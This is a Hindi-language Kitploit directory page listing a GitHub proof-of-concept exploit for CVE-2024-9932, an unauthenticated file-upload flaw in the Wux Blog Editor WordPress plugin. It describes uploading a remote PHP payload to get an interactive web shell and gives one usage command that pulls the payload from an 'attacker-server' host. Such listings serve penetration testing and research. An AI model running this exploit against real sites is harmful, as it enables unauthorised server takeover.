Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
0-click-RCE-Exploit-for-CVE-2024-9932 — CVE-2024-9932 के लिए बिना प्रमाणीकरण वाला 0-क्लिक RCE एक्सप्लॉइट। यह Wux Blog Editor WordPress प्लगइन में मनमाना फ़ाइल अपलोड भेद्यता का फायदा उठाकर एक रिमोट PHP पेलोड अपलोड करता है, लक्षित ऑपरेटिंग सिस्टम का पता लगाता है, और एक इंटरैक्टिव वेब शेल के माध्यम से रिमोट कमांड निष्पादन प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

GitHub
joshuaprovoste/0-click-rce-exploit-for-cve-2024-9932

0-click-RCE-Exploit-for-CVE-2024-9932

रिपॉजिटरी देखें
27 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-9932 के लिए बिना प्रमाणीकरण वाला 0-क्लिक RCE एक्सप्लॉइट। यह Wux Blog Editor WordPress प्लगइन में मनमाना फ़ाइल अपलोड भेद्यता का फायदा उठाकर एक रिमोट PHP पेलोड अपलोड करता है, लक्षित ऑपरेटिंग सिस्टम का पता लगाता है, और एक इंटरैक्टिव वेब शेल के माध्यम से रिमोट कमांड निष्पादन प्राप्त करता है।

साझा करें

CVE-2024-9932 / 0-क्लिक RCE एक्सप्लॉइट

  • लेखक: Joshua Provoste
  • https://x.com/JoshuaProvoste/status/1858329238153072668

CVE-2024-9932

यह रिपॉज़िटरी CVE-2024-9932 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो Wux Blog Editor WordPress प्लगइन में एक बिना प्रमाणीकरण वाली मनमानी फ़ाइल अपलोड भेद्यता है, जिससे रिमोट कमांड निष्पादन (RCE) होता है।

स्क्रिप्ट क्या करती है

स्क्रिप्ट एक असुरक्षित REST एंडपॉइंट का दुरुपयोग करके बिना प्रमाणीकरण के एक रिमोट PHP पेलोड अपलोड करती है। अपलोड होने के बाद, यह अंतिम फ़ाइल स्थान का पुनर्निर्माण करती है, लक्षित ऑपरेटिंग सिस्टम का पता लगाती है, और कमांड निष्पादन के लिए एक इंटरैक्टिव रिमोट शेल प्रदान करती है।

उपयोग

root@kitploit:~
python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php

निष्पादन के बाद, स्क्रिप्ट पेलोड अपलोड करती है, उसकी पहुँच की पुष्टि करती है, OS का पता लगाती है, और एक इंटरैक्टिव शेल में प्रवेश करती है।

नोट्स

  • किसी प्रमाणीकरण की आवश्यकता नहीं है (प्री-ऑथ / 0-क्लिक)।
टूल डाउनलोड करें